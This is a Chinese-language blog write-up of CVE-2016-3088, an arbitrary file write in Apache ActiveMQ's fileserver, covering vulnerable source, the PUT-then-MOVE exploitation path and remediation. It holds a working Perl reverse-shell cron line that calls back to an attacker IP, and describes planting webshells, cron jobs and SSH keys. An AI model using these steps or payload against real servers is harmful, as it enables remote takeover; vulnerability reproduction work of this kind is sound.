美文网首页
ActiveMQ任意文件写入漏洞(CVE-2016-3088)

ActiveMQ任意文件写入漏洞(CVE-2016-3088)

作者: Echocipher | 来源:发表于2018-12-29 13:23 被阅读0次

    ActiveMQ 是 Apache 软件基金会下的一个开源消息驱动中间件软件。Jetty 是一个开源的 servlet 容器,它为基于 Java 的 web 容器,例如 JSP 和 servlet 提供运行环境。ActiveMQ 5.0 及以后版本默认集成了jetty。在启动后提供一个监控 ActiveMQ 的 Web 应用。

    2016年4月14日,国外安全研究人员 Simon Zuckerbraun 曝光 Apache ActiveMQ Fileserver 存在多个安全漏洞,可使远程攻击者用恶意代码替代Web应用,在受影响系统上执行远程代码(CVE-2016-3088),漏洞影响版本:Apache ActiveMQ 5.x ~ 5.14.0。

    ZoomEye 上用 日期 和 ActiveMQ 作为关键词检索,分别探测了2015年1月1日(漏洞爆发前一年)和2017年1月1日(漏洞爆发后一年)互联网上 ActiveMQ 的总量情况,如下。

    ActiveMQ的web控制台分三个应用,admin、api和fileserver,其中admin是管理员页面,api是接口,fileserver是储存文件的接口;admin和api都需要登录后才能使用,fileserver无需登录。

    fileserver是一个RESTful API接口,我们可以通过GET、PUT、DELETE等HTTP请求对其中存储的文件进行读写操作,其设计目的是为了弥补消息队列操作不能传输、存储二进制文件的缺陷,但后来发现:

    1. 其使用率并不高
    2. 文件操作容易出现漏洞

    所以,ActiveMQ在5.12.x~5.13.x版本中,已经默认关闭了fileserver这个应用(你可以在conf/jetty.xml中开启之);在5.14.0版本以后,彻底删除了fileserver应用。

    原理

    首先下载源码,ActiveMQ 中的 FileServer 服务允许用户通过 HTTP PUT 方法上传文件到指定目录,在..\activemq-parent-5.7.0-source-release\activemq-parent-5.7.0\activemq-fileserver\src\main\java\org\apache\activemq\util目录下的RestFilter.java文件中可以看到put的处理方法。

        protected void doPut(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {
            if (LOG.isDebugEnabled()) {
                LOG.debug("RESTful file access: PUT request for " + request.getRequestURI());
            }
    
            if (writePermissionRole != null && !request.isUserInRole(writePermissionRole)) {
                response.sendError(HttpURLConnection.HTTP_FORBIDDEN);
                return;
            }
    
            File file = locateFile(request);
    
            if (file.exists()) {
                boolean success = file.delete(); // replace file if it exists
                if (!success) {
                    response.sendError(HttpURLConnection.HTTP_INTERNAL_ERROR); // file
                                                                                // existed
                                                                                // and
                                                                                // could
                                                                                // not
                                                                                // be
                                                                                // deleted
                    return;
                }
            }
    

    用户可以上传文件到指定目录,该路径在 ..\activemq-parent-5.7.0-source-release\activemq-parent-5.7.0\assembly\src\release\conf 中定义,如下:

                            <bean class="org.eclipse.jetty.webapp.WebAppContext">
                                <property name="contextPath" value="/fileserver" />
                                <property name="resourceBase" value="${activemq.home}/webapps/fileserver" />
                                <property name="logUrlOnStart" value="true" />
                                <property name="parentLoaderPriority" value="true" />
                            </bean>
    

    其中put方法调用了如下函数:

        private File locateFile(HttpServletRequest request) {
            return new File(filterConfig.getServletContext().getRealPath(request.getServletPath()), request.getPathInfo());
        }
    

    后台调用move关键代码如下:

        protected void doMove(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {
            if (LOG.isDebugEnabled()) {
                LOG.debug("RESTful file access: MOVE request for " + request.getRequestURI());
            }
    
            if (writePermissionRole != null && !request.isUserInRole(writePermissionRole)) {
                response.sendError(HttpURLConnection.HTTP_FORBIDDEN);
                return;
            }
    
            File file = locateFile(request);
            String destination = request.getHeader(HTTP_HEADER_DESTINATION);
    
            if (destination == null) {
                response.sendError(HttpURLConnection.HTTP_BAD_REQUEST, "Destination header not found");
                return;
            }
    
            try {
                URL destinationUrl = new URL(destination);
                IOHelper.copyFile(file, new File(destinationUrl.getFile()));
                IOHelper.deleteFile(file);
            } catch (IOException e) {
                response.sendError(HttpURLConnection.HTTP_INTERNAL_ERROR); // file
                                                                            // could
                                                                            // not
                                                                            // be
                                                                            // moved
                return;
            }
    

    可以看到该方法对目录路径没有任何限制和过滤,因此漏洞原理如下:

    fileserver支持写入文件(但不解析jsp),同时支持移动文件(MOVE请求)。所以,我们只需要写入一个文件,然后使用MOVE请求将其移动到任意位置,造成任意文件写入漏洞。

    利用

    文件写入有几种利用方法:

    1. 写入webshell
    2. 写入cron或ssh key等文件
    3. 写入jar或jetty.xml等库和配置文件

    写入webshell的好处是,门槛低更方便,但前面也说了fileserver不解析jsp,admin和api两个应用都需要登录才能访问,所以有点鸡肋;写入cron或ssh key,好处是直接反弹拿shell,也比较方便,缺点是需要root权限;写入jar,稍微麻烦点(需要jar的后门),写入xml配置文件,这个方法比较靠谱,但有个鸡肋点是:我们需要知道activemq的绝对路径。

    webshell

    需要写在admin或api应用中,而这俩应用都需要登录才能访问,默认账号及密码都为admin,我们可以通过put上传webshell到fileserver目录:

    我们发现提示401,是需要登录的,所以说比较鸡肋。我们登录之后再put

    我们通过访问fileserver/1.jsp发现上传已经成功,但是由于该目录没有执行权限,所以没有解析:

    接下来通过move移动到admin或者api下:

    首先要知道绝对路径在哪,这里有两种方法:

    1. 访问http://your-ip:8161/admin/test/systemProperties.jsp,查看ActiveMQ的绝对路径:

    2.通过伪造特殊的上传路径爆出绝对路径(5.7.0 复现):

    接下来通过move方法,将木马文件移动到api或者admin:

    接下来访问木马:

    成功解析。

    写入crontab,自动化弹shell

    这个方法需要ActiveMQ是root运行,否则也不能写入cron文件。
    这是一个比较稳健的方法。首先上传cron配置文件(注意,换行一定要\n,不能是\r\n,否则crontab执行会失败):

    */1 * * * * root /usr/bin/perl -e 'use Socket;$i="192.168.17.131";$p=21;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
    

    将其移动到/etc/cron.d/root:

    发现计划任务已经写入,等待反弹shell即可。

    这个方法需要ActiveMQ是root运行,否则也不能写入cron文件。

    上传SSH公钥

    首先生成密钥对。(如果已存在则不需要)

    然后上传、移动到/root/.ssh/并重命名为authorized_keys

    之后ssh登录即可

    写入jetty.xml或jar

    理论上我们可以覆盖jetty.xml,将admin和api的登录限制去掉,然后再写入webshell。

    有的情况下,jetty.xml和jar的所有人是web容器的用户,所以相比起来,写入crontab成功率更高一点。

    解决方案:

    1. ActiveMQ Fileserver 的功能在 5.14.0 及其以后的版本中已被移除。建议用户升级至 5.14.0 及其以后版本。

    2. 通过移除 conf\jetty.xml 的以下配置来禁用 ActiveMQ Fileserver 功能

    参考链接:

    1. https://www.seebug.org/vuldb/ssvid-96268
    2. https://github.com/vulhub/vulhub/blob/master/activemq/CVE-2016-3088/README.zh-cn.md

    相关文章

      网友评论

          本文标题:ActiveMQ任意文件写入漏洞(CVE-2016-3088)

          本文链接:https://www.haomeiwen.com/subject/moqulqtx.html